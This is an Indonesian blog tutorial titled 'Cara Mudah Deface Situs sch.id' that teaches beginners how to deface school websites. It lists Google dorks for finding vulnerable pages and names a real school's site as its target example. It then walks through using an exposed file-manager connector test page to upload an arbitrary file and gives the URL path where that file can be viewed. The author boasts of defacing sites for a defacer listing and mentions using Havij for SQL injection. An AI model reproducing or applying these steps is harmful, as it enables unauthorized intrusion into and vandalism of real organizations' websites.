Cara Mudah Deface Situs sch.id | Tutorial for Newbie

Cara Mudah Deface Situs sch.id. Sebenarnya ini cara yang lumayan lama. Namun karena mentok nggak ada bahan postingan, iseng-iseng tadi nambah list deface di indonesiandefacer.org pake cara ini. Mau pake SQLi, males. Kadang discan pake Havij udah nemu password sama usernya malah halaman buat loginnya gak ketemu.
Yaudah, pake cara ini saja. cara ini bisa dibilang cara yang paling mudah karena kita tidak perlu masuk lewat pintu depan/admin. Dan sekalian mau share di blog.

Alat
Google dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

File dengan format txt :
Terserah mau diisi apa. Boleh diisi puisi, misuh-misuh (jangan ding !), atau nomer hape (ini sih orang lebay) . pokoknya terserah deh !!!

langkah-langkah :
1. Masukkan dork diatas di kotak pencarian google.
2. Pilih salah satu situs yang muncul. disini saya ambil contoh : http://www.sman1gombong.sch.id/html/alumni.php
3. Ganti urlnya menjadi editor http://www.sman1gombong.sch.id/filemanager/connectors/test.html
4. Pada opsi connector, pilih PHP. lalu upload file txt milik kamu.
5. Untuk membuka hasilnya, exploitnya adalah http://site.sch.id/userfiles/file/namafile.txt . Jadi untuk contoh saya menjadi http://www.sman1gombong.sch.id/userfiles/file/Wonderk-ID.txt

Selesai !!
Mudah kan ???

Sekian tutorial kali ini. Semoga bermanfaat.

Shares

37 Comments

Leave a Reply